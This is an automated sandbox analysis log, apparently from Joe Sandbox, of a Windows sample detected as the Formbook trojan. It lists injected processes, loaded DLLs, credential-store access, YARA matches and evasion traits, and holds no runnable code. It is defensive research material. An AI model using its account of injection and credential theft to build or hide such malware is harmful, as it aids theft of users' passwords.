Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D8FFB1	13_2_04D8FFB1
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D8FF09	13_2_04D8FF09
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CD38E0	13_2_04CD38E0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D3D800	13_2_04D3D800
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CD9950	13_2_04CD9950
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CEB950	13_2_04CEB950
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D65910	13_2_04D65910
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D7DAC6	13_2_04D7DAC6
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D15AA0	13_2_04D15AA0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D71AA3	13_2_04D71AA3
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D6DAAC	13_2_04D6DAAC
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D8FA49	13_2_04D8FA49
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D87A46	13_2_04D87A46
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D43A6C	13_2_04D43A6C
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D45BF0	13_2_04D45BF0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D0DBF9	13_2_04D0DBF9
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CEFB80	13_2_04CEFB80
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D8FB76	13_2_04D8FB76
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_02CD1720	13_2_02CD1720
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_02CCC630	13_2_02CCC630
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_02CCAA18	13_2_02CCAA18
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_02CCA8C8	13_2_02CCA8C8
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_02CCA8D0	13_2_02CCA8D0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_02CCC850	13_2_02CCC850
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_02CD2FAB	13_2_02CD2FAB
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_02CD2FB0	13_2_02CD2FB0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_02CD4DC0	13_2_02CD4DC0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_02CEB440	13_2_02CEB440
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04AAE483	13_2_04AAE483
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04AB5414	13_2_04AB5414
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04AAE368	13_2_04AAE368
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04AAD888	13_2_04AAD888
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04AAE81C	13_2_04AAE81C
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04AACB13	13_2_04AACB13

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03287E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03275130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0322B970 appears 277 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 032AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 032BF290 appears 105 times
Source: C:\Windows\SysWOW64\wextract.exe	Code function: String function: 04CBB970 appears 277 times
Source: C:\Windows\SysWOW64\wextract.exe	Code function: String function: 04D17E54 appears 102 times
Source: C:\Windows\SysWOW64\wextract.exe	Code function: String function: 04D4F290 appears 105 times
Source: C:\Windows\SysWOW64\wextract.exe	Code function: String function: 04D3EA12 appears 86 times
Source: C:\Windows\SysWOW64\wextract.exe	Code function: String function: 04D05130 appears 58 times
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: String function: 004115D7 appears 36 times
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: String function: 00416C70 appears 39 times
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: String function: 00445AE0 appears 65 times

Source: oLCnCWQDhK.exe, 00000000.00000003.1260253086.000000000486D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs oLCnCWQDhK.exe
Source: oLCnCWQDhK.exe, 00000000.00000003.1260700980.00000000046C3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs oLCnCWQDhK.exe

Source: oLCnCWQDhK.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.svchost.exe.690000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.2503030807.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1910782362.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.2505420589.0000000004950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.2505519891.00000000049A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1910510903.0000000000690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.2505688280.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1911128401.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@3/2

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

Code function: 0_2_0044AF6C GetLastError,FormatMessageW,

0_2_0044AF6C

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,		0_2_004333BE
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,		0_2_00464EAE

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

Code function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,

0_2_0045D619

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

Code function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,

0_2_004755C4

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

Code function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0047839D

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

Code function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,

0_2_0043305F

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

File created: C:\Users\user~1\AppData\Local\Temp\sulfhydric

Source: oLCnCWQDhK.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: wextract.exe, 0000000D.00000002.2503345244.0000000002EA3000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 0000000D.00000003.2142187951.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 0000000D.00000002.2503345244.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 0000000D.00000003.2139945184.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 0000000D.00000003.2139830355.0000000002E52000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: oLCnCWQDhK.exe

ReversingLabs: Detection: 76%

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

File read: C:\Users\user\Desktop\oLCnCWQDhK.exe

Source: unknown	Process created: C:\Users\user\Desktop\oLCnCWQDhK.exe "C:\Users\user\Desktop\oLCnCWQDhK.exe"
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\oLCnCWQDhK.exe"
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	Process created: C:\Windows\SysWOW64\wextract.exe "C:\Windows\SysWOW64\wextract.exe"
Source: C:\Windows\SysWOW64\wextract.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\oLCnCWQDhK.exe"	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	Process created: C:\Windows\SysWOW64\wextract.exe "C:\Windows\SysWOW64\wextract.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Source: C:\Windows\SysWOW64\wextract.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Switches to a custom stack to bypass stack traces

Source: oLCnCWQDhK.exe

Static file information: File size 1396191 > 1048576

Source:	Binary string: wextract.pdb source: svchost.exe, 00000002.00000003.1878117159.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1877944865.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, EthPSueuMbeZ.exe, 0000000C.00000002.2504917914.00000000014B8000.00000004.00000020.00020000.00000000.sdmp, EthPSueuMbeZ.exe, 0000000C.00000003.1848017873.00000000014CB000.00000004.00000020.00020000.00000000.sdmp, EthPSueuMbeZ.exe, 0000000C.00000002.2504917914.00000000014EB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wextract.pdbGCTL source: svchost.exe, 00000002.00000003.1878117159.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1877944865.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, EthPSueuMbeZ.exe, 0000000C.00000002.2504917914.00000000014B8000.00000004.00000020.00020000.00000000.sdmp, EthPSueuMbeZ.exe, 0000000C.00000003.1848017873.00000000014CB000.00000004.00000020.00020000.00000000.sdmp, EthPSueuMbeZ.exe, 0000000C.00000002.2504917914.00000000014EB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EthPSueuMbeZ.exe, 0000000C.00000002.2503183301.0000000000C6E000.00000002.00000001.01000000.00000005.sdmp, EthPSueuMbeZ.exe, 00000010.00000000.1979513751.0000000000C6E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: oLCnCWQDhK.exe, 00000000.00000003.1260700980.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, oLCnCWQDhK.exe, 00000000.00000003.1261561282.0000000004740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1806232459.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1910830635.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804230710.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1910830635.000000000339E000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 0000000D.00000003.1916948837.0000000004AE3000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 0000000D.00000003.1910808388.000000000493E000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 0000000D.00000002.2505832283.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 0000000D.00000002.2505832283.0000000004E2E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: oLCnCWQDhK.exe, 00000000.00000003.1260700980.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, oLCnCWQDhK.exe, 00000000.00000003.1261561282.0000000004740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1806232459.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1910830635.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804230710.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1910830635.000000000339E000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, wextract.exe, 0000000D.00000003.1916948837.0000000004AE3000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 0000000D.00000003.1910808388.000000000493E000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 0000000D.00000002.2505832283.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 0000000D.00000002.2505832283.0000000004E2E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: wextract.exe, 0000000D.00000002.2506247486.00000000052BC000.00000004.10000000.00040000.00000000.sdmp, wextract.exe, 0000000D.00000002.2503345244.0000000002DF5000.00000004.00000020.00020000.00000000.sdmp, EthPSueuMbeZ.exe, 00000010.00000000.1980107532.000000000316C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2249916942.000000001C32C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: wextract.exe, 0000000D.00000002.2506247486.00000000052BC000.00000004.10000000.00040000.00000000.sdmp, wextract.exe, 0000000D.00000002.2503345244.0000000002DF5000.00000004.00000020.00020000.00000000.sdmp, EthPSueuMbeZ.exe, 00000010.00000000.1980107532.000000000316C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2249916942.000000001C32C000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,

0_2_0040EBD0

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_00416CB5 push ecx; ret	0_2_00416CC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_006931E0 push eax; ret	2_2_006931E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_006AA2B1 push ds; ret	2_2_006AA2D2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_006983A5 push 00000072h; ret	2_2_00698433
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_006A5413 push 10CBE7A4h; retf	2_2_006A54F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00691EF2 push edi; retf	2_2_00691EF3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0320225F pushad ; ret	2_2_032027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032027FA pushad ; ret	2_2_032027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032309AD push ecx; mov dword ptr [esp], ecx	2_2_032309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0320283D push eax; iretd	2_2_03202858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0320135E push eax; iretd	2_2_03201369
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CC09AD push ecx; mov dword ptr [esp], ecx	13_2_04CC09B6
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_02CD2230 push 10CBE7A4h; retf	13_2_02CD2310
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_02CE0652 push edx; ret	13_2_02CE065E
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_02CE05A7 pushad ; retf	13_2_02CE0602
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_02CD70CE push ds; ret	13_2_02CD70EF
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_02CC51C2 push 00000072h; ret	13_2_02CC5250
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04AA44BC push eax; retf	13_2_04AA44BE
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04AA7486 push ebp; iretd	13_2_04AA7495
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04AA50F9 push cs; ret	13_2_04AA5107
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04AA52A6 push esp; retf	13_2_04AA52A7
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04AB5252 push eax; ret	13_2_04AB5254
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04AA9FBC push eax; ret	13_2_04AA9FC7
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04AA58FA push ebx; ret	13_2_04AA5912
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04AAA9CA push edx; iretd	13_2_04AAA9D4

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_0047A330
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00434418

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	API/Special instruction interceptor: Address: 4182264
Source: C:\Windows\SysWOW64\wextract.exe	API/Special instruction interceptor: Address: 7FFB2CECD324
Source: C:\Windows\SysWOW64\wextract.exe	API/Special instruction interceptor: Address: 7FFB2CECD7E4
